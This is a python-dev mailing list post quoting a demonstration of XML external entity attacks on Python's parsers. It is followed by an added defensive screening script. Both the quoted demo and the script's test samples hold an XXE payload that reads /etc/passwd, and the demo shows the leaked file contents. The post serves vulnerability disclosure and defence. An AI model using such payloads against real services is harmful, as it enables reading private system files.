[Python-Dev] XML DoS vulnerabilities and exploits in Python

M.-A. Lemburg mal at egenix.com
Sun Feb 24 12:56:33 CET 2013


Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
> Am 21.02.2013 11:32, schrieb Antoine Pitrou:
>> You haven't proved that these were actual threats, nor how they
>> actually worked. I'm gonna remain skeptical if there isn't anything
>> more precise than "It highly depends on the parser and the application
>> what kind of exploit is possible".
> 
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
> 
> $ ./python-external.py
> 
> REQUEST:
> --------
> <weather>Aachen</weather>
> 
> RESPONSE:
> ---------
> <weather>The weather in Aachen is terrible.</weather
> 
> 
> REQUEST:
> --------
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY passwd SYSTEM "file:///etc/passwd">
> ]>
> <weather>&passwd;</weather>
> 
> 
> RESPONSE:
> ---------
> <error>Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi</error>
> 
> 
> REQUEST:
> --------
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE weather [
> <!ENTITY url SYSTEM
> "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
> ]>
> <weather>&url;</weather>
> 
> 
> RESPONSE:
> ---------
> <error>Unknown city -----BEGIN DH PARAMETERS-----
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -----END DH PARAMETERS-----
> 
> These are the 512 bit DH parameters from "Assigned Number for SKIP
> Protocols"
> (http://www.skip-vpn.org/spec/numbers.html).
> See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a
> safe prime.
> </error>
> 
> 
> Q.E.D.
> Christian

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 24 2013)
>>> Python Projects, Consulting and Support ...   http://www.egenix.com/
>>> mxODBC.Zope/Plone.Database.Adapter ...       http://zope.egenix.com/
>>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________

::::: Try our mxODBC.Connect Python Database Interface for free ! ::::::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
    D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
           Registered at Amtsgericht Duesseldorf: HRB 46611
               http://www.egenix.com/company/contact/
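The exchange Christian quotes works because the stdlib parser, left at its defaults, resolves `SYSTEM` entities (file:// and http:// alike) on the application's behalf. The following is an added example, not code from this thread and not defusedxml's own implementation: it pre-screens untrusted XML with `xml.parsers.expat` callbacks that abort on the first DOCTYPE, entity declaration or external entity reference, and only then hands the document to ElementTree. The names `UnsafeXMLError`, `screen_xml`, `parse_untrusted_xml` and `classify` are this example's own; the sample documents are constructed after the requests shown above.

```python
"""Defensive pre-screening of untrusted XML before parsing with the stdlib.

Added example (not from the python-dev thread, not defusedxml's code). It walks
the document once with expat and refuses any DTD construct, which is the
mechanism both the external-entity demo above and entity-expansion DoS rely on.
"""
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeXMLError(ValueError):
    """Raised when the document uses a DTD feature we refuse to process."""


def screen_xml(data: bytes) -> None:
    """Abort at the first DOCTYPE / entity construct; return None if clean.

    Malformed input raises xml.parsers.expat.ExpatError, as the stdlib would.
    """
    parser = xml.parsers.expat.ParserCreate()

    def reject(kind):
        # Exceptions raised inside a pyexpat handler propagate out of Parse().
        def handler(*_args):
            raise UnsafeXMLError(kind)
        return handler

    # <!ENTITY ...> can only appear inside a DOCTYPE, so refusing the DOCTYPE
    # itself blocks SYSTEM/PUBLIC entities and "billion laughs" expansion alike.
    parser.StartDoctypeDeclHandler = reject("doctype")
    parser.EntityDeclHandler = reject("entity-declaration")
    parser.UnparsedEntityDeclHandler = reject("unparsed-entity-declaration")
    # Belt and braces: never let expat fetch file:// or http:// content for us.
    parser.ExternalEntityRefHandler = reject("external-entity-reference")
    parser.Parse(data, True)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Screen first, then parse with ElementTree; returns the root element."""
    screen_xml(data)
    return ET.fromstring(data)


def classify(data: bytes) -> str:
    """Return 'ok', 'malformed', or the name of the rejected DTD construct.

    Suitable for a log line or metric on the application's input boundary.
    """
    try:
        screen_xml(data)
    except UnsafeXMLError as exc:
        return str(exc)
    except xml.parsers.expat.ExpatError:
        return "malformed"
    return "ok"


# Constructed sample documents, modelled on the requests in the quoted demo.
BENIGN = b"<weather>Aachen</weather>"
XXE_FILE = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE weather [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<weather>&passwd;</weather>"""
# Internal entities are the building block of expansion (DoS) attacks; they
# are caught by the same DOCTYPE check.
INTERNAL_ENTITY = b'<!DOCTYPE weather [<!ENTITY a "aaaa">]><weather>&a;</weather>'

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("xxe-file", XXE_FILE),
                      ("internal-entity", INTERNAL_ENTITY)]:
        print(f"{name:16s} -> {classify(doc)}")
    root = parse_untrusted_xml(BENIGN)
    print(f"parsed <{root.tag}> with text {root.text!r}")
```

Rejecting the whole DOCTYPE is deliberately coarser than filtering individual entity kinds: legitimate machine-to-machine XML almost never needs an inline DTD, and the coarse rule leaves no room for parser-specific surprises about which entities get resolved.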

